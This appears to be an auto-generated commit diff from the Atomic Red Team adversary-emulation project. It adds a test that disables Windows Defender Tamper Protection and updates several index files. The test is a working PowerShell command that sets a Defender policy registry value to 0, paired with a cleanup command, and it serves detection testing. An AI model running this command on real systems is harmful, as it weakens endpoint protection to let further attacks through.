Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2022-03-30 20:04:14 +00:00
parent f1fe392c26
commit 660993d192
6 changed files with 53 additions and 0 deletions
@@ -405,6 +405,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
@@ -266,6 +266,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
@@ -635,6 +635,7 @@
  - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
  - Atomic Test #26: Disable Windows Defender with DISM [windows]
  - Atomic Test #27: Disable Defender with Defender Control [windows]
+  - Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -442,6 +442,7 @@
  - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
  - Atomic Test #26: Disable Windows Defender with DISM [windows]
  - Atomic Test #27: Disable Defender with Defender Control [windows]
+  - Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -26573,6 +26573,20 @@ defense-evasion:
 '
        name: powershell
        elevation_required: true
+    - name: Disable Windows Defender Tamper Protection
+      auto_generated_guid: 5fde6578-9419-46ef-9258-269dc8656c3e
+      description: Disabling Windows Defender tamper protection to allow attacks such
+        as [Process Doppleganging](https://medium.com/cyber-unbound/process-doppelg%C3%A4nging-684bdd6b760f).
+        Tamper Protection will be disabled after the next reboot.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          New-Item -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature'
+          New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
+        cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
+          Defender\Feature' -name 'TamperData' -value 1
+        name: powershell
  T1078.002:
    technique:
      external_references:
@@ -58,6 +58,8 @@

 - [Atomic Test #27 - Disable Defender with Defender Control](#atomic-test-27---disable-defender-with-defender-control)

+- [Atomic Test #28 - Disable Windows Defender Tamper Protection](#atomic-test-28---disable-windows-defender-tamper-protection)
+

 <br/>

@@ -1149,4 +1151,37 @@ expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$e



+<br/>
+<br/>
+
+## Atomic Test #28 - Disable Windows Defender Tamper Protection
+Disabling Windows Defender tamper protection to allow attacks such as [Process Doppleganging](https://medium.com/cyber-unbound/process-doppelg%C3%A4nging-684bdd6b760f). Tamper Protection will be disabled after the next reboot.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5fde6578-9419-46ef-9258-269dc8656c3e
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+New-Item -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature'
+New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 1
+```
+
+
+
+
+
 <br/>